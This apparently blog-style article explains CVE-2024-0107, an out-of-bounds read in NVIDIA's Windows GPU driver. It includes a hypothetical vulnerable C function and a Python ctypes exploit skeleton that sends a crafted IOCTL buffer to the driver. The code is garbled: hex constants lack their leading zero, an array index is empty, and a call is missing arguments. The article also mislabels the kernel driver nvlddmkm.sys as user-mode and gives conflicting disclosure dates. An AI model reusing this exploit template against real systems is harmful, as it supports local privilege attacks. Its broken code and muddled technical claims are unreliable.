CVE-2024-0107 - Breaking Down the NVIDIA GPU Display Driver Vulnerability on Windows

In early 2024, NVIDIA disclosed a serious vulnerability in its Windows GPU Display Driver: CVE-2024-0107. This bug lies inside the user-mode layer of the driver and, if exploited, lets a regular user trigger an out-of-bounds (OOB) read. This flaw isn’t just theoretical—if left unpatched, attackers could leverage it to run their own code, crash your PC (Denial of Service), escalate privileges, leak sensitive info, or even tamper with your data.

In this article, we’ll break down how CVE-2024-0107 works, show some code snippets that demonstrate the issue, and link to the original advisories. Whether you’re an admin, a gamer, or a curious hacker, this post is for you.

Exploitability: Local (any regular user)

- CVE Details: NVD CVE-2024-0107 page
- NVIDIA Security Bulletin: NVIDIA Security Bulletin – January 2024

Technical Details

The vulnerability exists because the user-mode driver fails to properly check boundaries when processing certain data sent from user space to the kernel through IOCTL (input/output control) requests. Users can send specially-crafted data buffers to user-mode driver interfaces (like nvlddmkm.sys). If these buffers contain certain values, the driver will read memory beyond the expected range—leading to an out-of-bounds read.

This OOB read can leak sensitive data, crash the system, or, in worse cases, result in code execution if combined with other Windows kernel tricks.

User program sends a crafted IOCTL request to the GPU display driver.

2. Driver reads from a buffer based on user-supplied index/length, without proper boundary check.

Let’s imagine there’s a function in the driver like this

// Hypothetical vulnerable code in driver
NTSTATUS HandleIOCTL(PVOID userBuffer, SIZE_T size) {
    UINT8 localArray[x20]; // buffer of 32 bytes

    // Bad: Reads user-supplied 'index' directly without bounds check
    UINT32 index = ((UINT32*)userBuffer)[];

    UINT8 value = localArray[index]; // <-- OOB read if index >= 32!

    // ... More processing ...
    return STATUS_SUCCESS;
}

If the user sends an index greater than or equal to 32, the driver reads memory outside localArray, potentially disclosing kernel stack data or triggering a crash.

How to Exploit CVE-2024-0107

Pre-requisites:

Ability to send IOCTL requests (common via DeviceIoControl in user space).

Here’s a basic exploit concept in Python using ctypes—this won’t trigger a real bug (since we don’t know the exact IOCTL or vulnerability offset), but shows the typical structure:

import ctypes
import struct
from ctypes import wintypes

# Open the device (usually requires some trial and error or rooting in documentation)
device_name = r'\\\\.\\NVIDIA'
GENERIC_READ  = x80000000
GENERIC_WRITE = x40000000

CreateFile = ctypes.windll.kernel32.CreateFileW
DeviceIoControl = ctypes.windll.kernel32.DeviceIoControl

handle = CreateFile(
    device_name,
    GENERIC_READ | GENERIC_WRITE,
    , None, 3, , None
)

if handle == -1:
    print('Failed to open device')
    exit()

# Prepare the malicious buffer: e.g., index out of bounds
malicious_buffer = struct.pack('<I', xDEADBEEF) # Big number, causes OOB

# Example IOCTL code (replace with real one for NVIDIA driver)
IOCTL_CODE = x00222003

out_buf = ctypes.create_string_buffer(4)
ret = wintypes.DWORD()

res = DeviceIoControl(
    handle, IOCTL_CODE,
    malicious_buffer, len(malicious_buffer),
    out_buf, 4, ctypes.byref(ret), None
)

print('Sent OOB IOCTL, result:', res)

Note:
- You need to know the precise IOCTL code and the buffer format from reverse engineering or leaked documentation for a real exploit.
- Tools like Process Monitor and Process Explorer can help you identify device handles.

Denial of Service: Crash the Windows system or just the driver.

- Info Leak: Read sensitive driver or kernel memory, possibly stealing passwords, kernel pointers, etc.
- Privilege Escalation: Pair OOB read with other driver bugs to write to arbitrary memory (common in local privilege exploits).
- Code Execution: (Advanced) Gain code execution in kernel mode—leading to breaking Windows security.

How to Protect Yourself

- Update Now: NVIDIA released patched drivers.

Check Your Version:

Open NVIDIA Settings → Help → System Info. If your driver is older than the fixed version in the security bulletin, update ASAP.

- Avoid Untrusted Software: Don’t run unknown EXEs that could try exploiting this at the local level.

- Monitor for Threats: Keep Windows Defender or another AV active; some advanced signatures already detect attempts to abuse this class of driver flaws.

Links & Further Reading

- NVD: CVE-2024-0107
- NVIDIA Security Bulletin
- NVIDIA Driver Downloads
- Microsoft Windows Driver IOCTL Reference
- Intro to IOCTL Exploitation (BlackHat)

Final Thoughts

CVE-2024-0107 isn’t a remote bug, but it’s easily accessible for anyone who can just run a program—especially worrying on shared or VM environments. NVIDIA’s user-mode driver layer is a high-privilege target, and historically, GPU drivers have been a weak link in PC security. Patch *now* and, if you’re running a business, make sure your endpoints update automatically!

Timeline

Published on: 08/08/2024 16:57:49 UTC